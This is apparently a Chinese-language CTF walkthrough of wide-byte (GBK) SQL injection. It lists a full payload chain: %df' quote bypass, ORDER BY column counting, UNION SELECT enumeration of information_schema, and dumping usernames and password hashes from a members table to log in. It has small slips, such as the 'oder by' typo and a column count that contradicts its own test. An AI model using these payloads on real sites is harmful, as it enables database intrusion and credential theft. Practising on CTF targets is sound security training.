宽字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/宽字节注入/
先构造payload:%df' 报错,存在宽字节注入
然后加:%df' oder by 5--+或者%df' order by 5%23(#)
5不报错,6报错,所以只有6个字段,联合查询
id=-1%df' union select 1,2,3,4,5%23,发现3,5回显
id=-1%df' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()%23
猜测在第二个表里,由于单引号被转义,所以进行16进制编码(不带单引号),继续构造
id=-1%df' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x73746F726D67726F75705F6D656D626572%23
id=-1%df' union select 1,2,group_concat(name),4,group_concat(password) from stormgroup_member%23
把密码md5解密,一个一个试,也可以先把status爆出来,发现分别是0,1所以直接拿第二个登录,拿到key
这里提供一个CGctf平台宽字节注入练手的题目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1